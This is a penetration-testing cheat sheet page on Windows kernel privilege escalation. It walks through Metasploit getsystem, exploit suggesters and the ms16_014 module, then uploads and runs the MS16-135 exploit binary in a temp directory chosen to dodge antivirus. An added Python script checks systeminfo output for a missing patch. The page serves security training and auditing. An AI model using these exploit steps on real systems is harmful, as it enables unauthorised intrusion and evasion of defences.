# Win Kernel Privesc

### Once you have access to the target and a meterpreter session, follow the technique below:

## Local Privilege Escalation

```
# From the meterpreter session
getprivs

    Enabled Process Privileges
    ==========================
    Name
    ----
    SeChangeNotifyPrivilege
    SeIncreaseWorkingSetPrivilege

getsystem
    [-] priv_elevate_getsystem: Operation failed: 691 The following was attempted:
    [-] Named Pipe Impersonation (In Memory/Admin)
    [-] Named Pipe Impersonation (Dropper/Admin)
    [-] Token Duplication (In Memory/Admin)
    [-] Named Pipe Impersonation (RPCSS variant)
    [-] Named Pipe Impersonation (PrintSpooler variant)
    [-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
# failed
```

* Enumerate Windows Kernel vulnerabilities with Metasploit


```
background                                   # return to msfconsole, keeping the session open
search suggester
use post/multi/recon/local_exploit_suggester
sessions                                     # note the id of the backgrounded session
set SESSION 7
run
```

<figure><img src="/files/9HpzUmy25ozMEcGikvkA" alt="" width="563"><figcaption></figcaption></figure>

* `e.g.` [Windows WMI Receive Notification Exploit - ms16\_014\_wmi\_recv\_notif](https://www.rapid7.com/db/modules/exploit/windows/local/ms16_014_wmi_recv_notif/)
  * *This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl*

```
use exploit/windows/local/ms16_014_wmi_recv_notif
set SESSION 7
set LPORT 4422      # a port different from the handler already serving session 7
exploit
```

<figure><img src="/files/FErofJ2qFYVVvvD44oZv" alt="" width="563"><figcaption></figcaption></figure>

* By using a kernel exploit for this specific version of the Windows O.S., the attacker obtains a `meterpreter` session with **elevated privileges**.

## Manual Privilege Escalation

**Windows-Exploit-Suggester**

* Open a Kali VM terminal session and use [Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester)

```
mkdir Windows-Exploit-Suggester
cd Windows-Exploit-Suggester
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py
# ^^ This is a python3 version of the script

# xlrd is needed to read the .xls bulletin database
pip install xlrd --upgrade

# Download the current Microsoft Security Bulletin database
python ./windows-exploit-suggester.py --update
    [*] initiating winsploit version 3.3...
    [+] writing to file 2023-03-15-mssb.xls
    [*] done
```

* Use <https://cloudconvert.com/xlsx-to-xls> to convert the `2023-03-15-mssb.xls` file to `.xlsx` and back to `.xls`
* Run the script


```
# win2008r2-systeminfo.txt holds the output of `systeminfo` run on the target
./windows-exploit-suggester.py --database 2023-03-15-mssb.xls --systeminfo win2008r2-systeminfo.txt
```

<figure><img src="/files/vRHlhMIs6stKH4uZQxgc" alt=""><figcaption></figcaption></figure>

**MS16-135**

* [Microsoft Windows Kernel - 'win32k' Denial of Service (MS16-135)](https://www.exploit-db.com/exploits/40745)
* [Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (2)](https://www.exploit-db.com/exploits/41015/)

```
[E]MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]  https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]  https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]  https://github.com/tinysec/public/tree/master/CVE-2016-7255
```
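The Windows-Exploit-Suggester run above and the MS16-135 entry it produces both rest on one check: the hotfix list in `systeminfo` does not contain the KB article that fixes the bulletin (KB3199135 for MS16-135). The script below is an added example, not code from this page or from the Windows-Exploit-Suggester project, that performs that check on a captured `systeminfo` dump so a host can be confirmed patched after remediation. The bulletin-to-KB table contains only the MS16-135 mapping shown on the page, and the two `systeminfo` samples are constructed for the example.

```python
"""
Audit a captured `systeminfo` dump for a missing kernel patch.

Added example, not code from this page or from Windows-Exploit-Suggester.
It reproduces the core check that tool performs: collect the installed
hotfix KB numbers from `systeminfo` output and compare them with the KB
article that fixes a bulletin. The only mapping is the one this page shows
for MS16-135 (KB3199135); the sample dumps below are constructed.
"""
import re
from dataclasses import dataclass

# Bulletin -> (fixing KB article, title). Taken from the MS16-135 line on the page.
# For a real audit, extend this table from the MSSB spreadsheet the suggester downloads.
BULLETINS = {
    "MS16-135": ("KB3199135", "Security Update for Windows Kernel-Mode Drivers"),
}

# Constructed sample: a Server 2008 R2 host without KB3199135.
SAMPLE_UNPATCHED = """\
Host Name:                 WIN2008R2-LAB
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2999226
                           [02]: KB3118401
                           [03]: KB976932
"""

# Constructed sample: the same host after the MS16-135 update was applied.
SAMPLE_PATCHED = SAMPLE_UNPATCHED.replace(
    "3 Hotfix(s) Installed.", "4 Hotfix(s) Installed."
) + "                           [04]: KB3199135\n"


@dataclass
class SystemInfo:
    os_name: str
    os_version: str
    hotfixes: frozenset  # installed KB ids, e.g. {"KB3199135"}


def parse_systeminfo(text: str) -> SystemInfo:
    """Extract OS name, OS version and installed KB numbers from `systeminfo` output."""

    def field_value(label: str) -> str:
        m = re.search(rf"^{re.escape(label)}:\s*(.+?)\s*$", text, re.MULTILINE)
        return m.group(1) if m else ""

    # KB ids only appear in the Hotfix(s) section, and the "KB" tag is the same
    # regardless of the locale the surrounding labels are printed in.
    hotfixes = frozenset(re.findall(r"\bKB\d{6,7}\b", text))
    return SystemInfo(field_value("OS Name"), field_value("OS Version"), hotfixes)


def missing_patches(info: SystemInfo, bulletins=BULLETINS) -> list:
    """Return the bulletins whose fixing KB is not installed, sorted for stable output."""
    return sorted(b for b, (kb, _title) in bulletins.items() if kb not in info.hotfixes)


if __name__ == "__main__":
    for label, dump in (("unpatched", SAMPLE_UNPATCHED), ("patched", SAMPLE_PATCHED)):
        info = parse_systeminfo(dump)
        gaps = missing_patches(info)
        print(f"{label}: {info.os_name} {info.os_version}")
        print("  missing:", ", ".join(f"{b} ({BULLETINS[b][0]})" for b in gaps) or "none")
```

Run it against a real dump by reading the `systeminfo` text file into `parse_systeminfo`. Two limits carry over from the tool this mirrors: `systeminfo` only lists hotfixes the host reports through the same interface, so a cumulative update that supersedes KB3199135 is not recognised and the host is flagged as missing the patch (a false positive worth confirming with `wmic qfe` or the update history), and a dump reading `Hotfix(s): N/A` yields every bulletin in the table as missing.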

* Search **`MS16-135`** in the [**windows-kernel-exploits**](https://github.com/SecWiki/windows-kernel-exploits) GitHub repository
  * [MS16-135 exploit](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135)
  * review the [41015.c](https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS16-135/41015.c) `C` source to confirm the code does what it claims before trusting a binary from a third-party repository
  * in this case I will use the pre-built executable `41015.exe`
* Knowing that this specific Windows version is vulnerable to this particular exploit, proceed with the exploitation

Use the `meterpreter` session to upload `41015.exe` to the `temp` directory on the Windows host

```
cd C:\\
mkdir temp
cd temp\\
# Reduce the likelihood of antivirus detection by using the temp directory

upload 41015.exe
shell
.\41015.exe 7
```

<figure><img src="/files/MDosD7v1IpydwHS53EHH" alt="" width="563"><figcaption></figcaption></figure>


Source: https://yashmehta.gitbook.io/ejptv2-cheatsheet/post-exploitation/privilege-escalation/windows-privilege-escalation/win-kernel-privesc.md